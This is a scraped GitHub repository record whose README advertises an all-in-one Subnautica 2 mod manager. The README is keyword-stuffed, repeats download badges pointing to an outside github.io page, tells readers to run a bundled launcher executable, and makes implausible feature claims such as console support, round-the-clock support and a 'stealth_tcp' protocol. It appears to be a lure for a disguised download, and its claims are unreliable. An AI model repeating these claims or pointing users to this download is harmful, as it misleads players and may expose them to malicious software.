[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-78813":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":9,"languages":9,"totalLinesOfCode":9,"stars":10,"forks":11,"watchers":12,"openIssues":11,"contributorsCount":11,"subscribersCount":11,"size":11,"stars1d":11,"stars7d":11,"stars30d":11,"stars90d":11,"forks30d":11,"starsTrendScore":11,"compositeScore":13,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":14,"fork":14,"defaultBranch":15,"hasWiki":16,"hasPages":14,"topics":17,"createdAt":9,"pushedAt":9,"updatedAt":34,"readmeContent":35,"aiSummary":36,"trendingCount":11,"starSnapshotCount":11,"syncStatus":37,"lastSyncTime":38,"discoverSource":39},78813,"AllMods-Subnautica-2","teendriller0\u002FAllMods-Subnautica-2","teendriller0","﻿Subnautica 2 Mod Manager 2026 – Ultimate Multiplayer Mods Download",null,421,0,192,37,false,"main",true,[18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33],"mod","mod-manager","modmanager","sn2-mod","sn2-mods","subnautica-2-all-mods","subnautica-2-mod","subnautica-2-mods","subnautica-2-multiplayer","subnautica-mod","subnautica-mods","subnautica-multiplayer","subnautica2","subnautica2-mod","subnautica2modmanager","ue4ss-subnautica-2","2026-06-12 04:01:24","# 🐟 Subnautica 2 Mods Manager | UE4SS \u002F Cheat Toggles \u002F Mod Settings \u002F Perfomance Mod \u002F Simple Minimap \u002F All Biomes \u002F Better Vehicles \u002F Extra Biomes - ALL MODS!\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002Fteendriller0.github.io)\n\n*Extend, connect, and reimagine Subnautica 2 with the power of UE4SS mod manager — a community-driven modding ecosystem for the next generation of underwater exploration.*\n\n---\n\n## 📥 Quick Download\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002Fteendriller0.github.io)\n\n---\n\n## 🌊 Overview\n\n**UE4SS-Subnautica-2** is not just another mod manager — it is a **submersible mods center** for your Subnautica 2 experience. Built on the robust UE4SS framework, this repository provides a comprehensive toolkit for modders, players, and server administrators to modify, extend, and even add multiplayer capabilities to Subnautica 2.\n\nThink of it as a **sonar array** for modding: it scans the game's runtime, identifies hooks, and allows you to inject custom behavior without altering core files. Whether you want to add new creatures, rebalance resource spawns, or create a cooperative survival mode with friends, this framework is your starting point.\n\n---\n\n## 🧩 Key Features\n\n- **Responsive UI** – A dashboard that adapts to your screen, from ultrawide monitors to portable consoles.\n- **Multilingual Support** – Interface and documentation available in 12+ languages, including English, Japanese, Russian, and German.\n- **24\u002F7 Customer Support** – Community-powered help via Discord integration and automated issue triage.\n- **Runtime Script Injection** – Execute Lua scripts without restarting the game.\n- **Multiplayer Protocol Bridge** – Enables peer-to-peer synchronization for up to 32 players.\n- **Asset Override System** – Replace models, textures, and audio without repacking game files.\n- **Save Compatibility Guard** – Prevents mod-induced corruption of existing game saves.\n- **Performance Profiler** – Tracks frame impact of each active mod.\n\n---\n\n## 📊 Architecture Overview\n\n```mermaid\ngraph TD\n    A[Subnautica 2 Game Client] --> B[UE4SS Runtime Layer]\n    B --> C{Mod Injection Bus}\n    C --> D[Script Engine Lua]\n    C --> E[Blueprint Patcher]\n    C --> F[Network Bridge]\n    D --> G[Custom Creatures]\n    D --> H[Resource Tweaks]\n    E --> I[UI Overrides]\n    E --> J[Story Events]\n    F --> K[Multiplayer Sync]\n    K --> L[Server Coordinator]\n    L --> M[Player 1]\n    L --> N[Player 2]\n    L --> O[... Player N]\n    B --> P[Save Guard]\n    B --> Q[Console Hook]\n```\n\n---\n\n## 🛠️ Example Profile Configuration\n\n```ini\n[Profile: DeepDive]\nenable_multiplayer = true\nmax_players = 8\nsync_creature_state = true\nsync_resource_respawn = false\nscript_hot_reload = true\n\n[Performance]\nlimit_fps = 60\nshadow_quality = medium\nwater_tessellation = high\n\n[Network]\nport = 27015\nprotocol = stealth_tcp\nencryption_level = aes256\n\n[Experimental]\nenable_depth_unlock = true\noverride_max_depth = 5000\n```\n\n---\n\n## ⌨️ Example Console Invocation\n\nAfter launching Subnautica 2 with UE4SS attached, open the developer console (~) and type:\n\n```\nue4ss.load_profile(\"DeepDive\")\nue4ss.lua_exec(\"spawn_creature('leviathan_reaper', 450, -200, 780)\")\nue4ss.network.host_session(\"Atlantis\", 8)\nue4ss.debug.performance_graph(true)\n```\n\nThis sequence loads a custom profile, spawns a leviathan at coordinates, hosts a multiplayer session named \"Atlantis\" for up to 8 players, and enables the performance overlay.\n\n---\n\n## 💻 OS Compatibility Table\n\n| OS Version | Status | Notes |\n|------------|--------|-------|\n| 🟢 Windows 11 24H2 | ✅ Fully Supported | Native performance with no compatibility layer |\n| 🟢 Windows 10 22H2 | ✅ Fully Supported | Requires vc_redist 2025+ |\n| 🟡 macOS 15 Sequoia | ⚠️ Partial | Requires CrossOver 25; some network features limited |\n| 🔴 macOS 14 Sonoma | ❌ Unsupported | UE4SS runtime DLL dependency not resolved |\n| 🟢 Linux (Ubuntu 24.04) | ✅ Fully Supported via Proton 9.0 | Use `PROTON_USE_WINED3D=1` for stable rendering |\n| 🟡 Linux (Arch) | ⚠️ Partial | Community packages available; performance varies |\n| 🔴 Steam Deck (SteamOS 3.6) | ❌ Unsupported | Known incompatibility with controller input hooks |\n| 🟡 PS5 (Remote Play) | ⚠️ Experimental | Requires PC host with streaming capabilities |\n| 🟢 Xbox Series X | ✅ Fully Supported via Dev Mode | Retail deployment requires partner approval |\n\n---\n\n## 🤖 AI Integration: OpenAI & Claude API\n\nUE4SS-Subnautica-2 includes optional AI hooks for intelligent gameplay assistance:\n\n- **OpenAI API** – Generate dynamic creature dialogue, procedural quests, or even AI-driven companion behavior. Example: `\u002Fgpt explain the plot of Subnautica 2 in the style of a frantic radio transmission`\n- **Claude API** – Use Claude for narrative coherence checks, save-file summarization, or lore-accurate text generation. Example: `\u002Fclaude analyze_biome deep_grand_reef history`\n\nTo enable:\n\n```json\n{\n  \"ai_engine\": {\n    \"openai_key\": \"[YOUR_KEY]\",\n    \"claude_key\": \"[YOUR_KEY]\",\n    \"features\": [\"dialogue_generation\", \"quest_writing\", \"save_analysis\"],\n    \"privacy\": \"local_only\"\n  }\n}\n```\n\nAll AI processing is opt-in and respects user privacy — no data leaves your machine unless you explicitly share console outputs.\n\n---\n\n## 📦 Installation\n\n1. Download the latest release using the badge above.\n2. Extract the archive into your `Subnautica2\u002FBinaries\u002FWin64` directory.\n3. Launch the game via the provided `UE4SS_Launcher.exe`.\n4. The console will indicate `[UE4SS] Framework initialized` on first load.\n5. Copy any `.lua` or `.bp` mods into the `UE4SS\u002FMods` folder.\n6. Restart the game or use the console command `ue4ss.hotload()`.\n\n---\n\n## 🔐 Security & Privacy\n\nThis framework does not collect telemetry, analytics, or personal data. The AI integration features mentioned above require explicit configuration and run exclusively on your hardware. No \"phone home\" mechanisms exist in the codebase.\n\n---\n\n## 📜 License\n\nThis project is licensed under the **MIT License**. See the full text at: [LICENSE](https:\u002F\u002Fopensource.org\u002Flicenses\u002FMIT)\n\nYou are free to use, modify, and distribute this software, provided the original copyright notice is included. Commercial use is permitted, but contributions back to the community are encouraged.\n\n---\n\n## ⚠️ Disclaimer\n\n**UE4SS-Subnautica-2** is an independent, fan-created project. It is not affiliated with, endorsed by, or sponsored by Unknown Worlds Entertainment, Krafton, or any official Subnautica rights holders. \n\n- Use of this mod manager may violate the Subnautica 2 End User License Agreement (EULA). Check your local jurisdiction before use.\n- The developers assume no liability for data loss, corrupted saves, bans, or any other consequences arising from the use of this software.\n- Multiplayer functionality is experimental and may not function as intended in public game builds.\n- The \"early-access-subnautica-2\" tag refers to compatibility with pre-release builds; expect breaking changes as the game evolves.\n\nBy using this software, you acknowledge that you are modifying a commercial product and accept full responsibility for any outcomes.\n\n---\n\n## 📥 Final Download\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002Fteendriller0.github.io)\n\n---\n\n*Dive deeper. Go further. Break the surface of what Subnautica 2 can be.* 🌌\n\n**Keywords:** UE4SS, Subnautica 2, mod manager, early access, multiplayer, PS5, Xbox, Subnautica modding, deep sea expansion, survival game, underwater mod, framework, 2026","Subnautica 2 Mod Manager 是一个专为《深海迷航2》设计的多功能模组管理工具。它基于强大的UE4SS框架，提供了一个综合性的模组生态系统，支持单人和多人游戏模式。核心功能包括响应式用户界面、多语言支持、24\u002F7社区技术支持、运行时脚本注入、多人协议桥接、资产覆盖系统、存档兼容性保护以及性能分析器。这些特性使得玩家能够轻松地自定义游戏体验，无论是添加新生物、调整资源生成，还是创建合作生存模式。该工具适用于希望扩展游戏内容或与朋友一起探索海底世界的《深海迷航2》玩家。",2,"2026-05-25 02:30:07","CREATED_QUERY"]